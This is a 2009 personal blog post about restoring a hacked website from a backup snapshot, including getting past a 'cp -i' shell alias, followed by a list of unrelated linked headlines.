Site restoration
by Mark on May.27, 2009, under general
Once again I was notified that ask-mark.com was triggering virus/malware alerts for visitors. My preliminary investigation at work showed that I had some sort of script injected into my files again. Unfortunately, I couldn’t get cygwin and ssh to connect to my host through the proxy server.
When I got home, I connected to my host and poked around, investigating how my site got hacked again. Not finding any obvious evidence other than file modify dates from yesterday, I decided to restore from one of my snapshots. I found that a snapshot from last week was not affected by whatever hacked my site. I wanted to restore the snapshot without first deleting the entire contents of my site. So, I tried using cp -rf ..., but I found that I was still being prompted to overwrite files. A little searching, and I found that my .bashrc file had an alias for cp = 'cp -i' so that it always ran in interactive mode. Commenting out that alias prevented the overwrite prompts, and now my site is back. I went back and restored the alias to ensure I don’t accidentally overwrite a critical folder in the future.
I just found out that the website for another organization with which I work is facing a similar hack. Does anyone know how all of these websites are getting hacked? Are the CMS packages (WordPress, .NET Nuke) insecure? Or are hackers gaining access some other way?
Also, never underestimate the usefulness of backups.
Related posts:
Interesting items- Sheriff's police bust prostitution ring in northwest suburbs
- Xbox Live 12-Month Gold Subscription Card $30
- Run Your Own Free Proxy Through the Google App Engine [Proxy]
- Woman Crashes Car While Shaving Vag
- Crash closes major Schaumburg intersection
- A Bizarre Story: Newegg, Fake Core i7 Processors and a Cease & Desist Order [Intel]
- will the last one at SF Gate / San Francisco Chronicle please turn out the lights? | violet blue ® :: open source sex
Recent Comments